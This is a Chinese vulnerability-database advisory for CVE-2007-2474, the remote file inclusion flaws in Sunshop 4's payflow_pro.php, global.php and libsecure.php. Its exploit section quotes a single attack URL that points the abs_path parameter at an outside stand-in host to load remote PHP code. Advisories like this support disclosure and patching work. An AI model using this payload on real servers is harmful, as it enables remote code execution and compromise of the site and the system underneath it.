TurnkeyWebTools Sunshop 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112791 漏洞类型 代码注入
发布时间 2007-04-25 更新时间 2007-05-03
CVE编号 CVE-2007-2474 CNNVD-ID CNNVD-200705-059
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/29908
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-059
|漏洞详情
TurnkeyWebToolsSunShopShoppingCart中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)include/payment/payflow_pro.php,(2)global.php或(3)libsecure.php的abs_path参数中的一个URL,执行任意的PHP代码。此漏洞不同于CVE-2007-2070。
|漏洞EXP
source: http://www.securityfocus.com/bid/23662/info

Sunshop is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect Sunshop 4; other versions may also be vulnerable. 

http://www.example.com/include/payment/payflow_pro.php?abs_path=http://www.example2.com/?
|参考资料

来源:BID
名称:23662
链接:http://www.securityfocus.com/bid/23662
来源:BUGTRAQ
名称:20070425sunshopv4>>RFI
链接:http://www.securityfocus.com/archive/1/archive/1/466850/100/0/threaded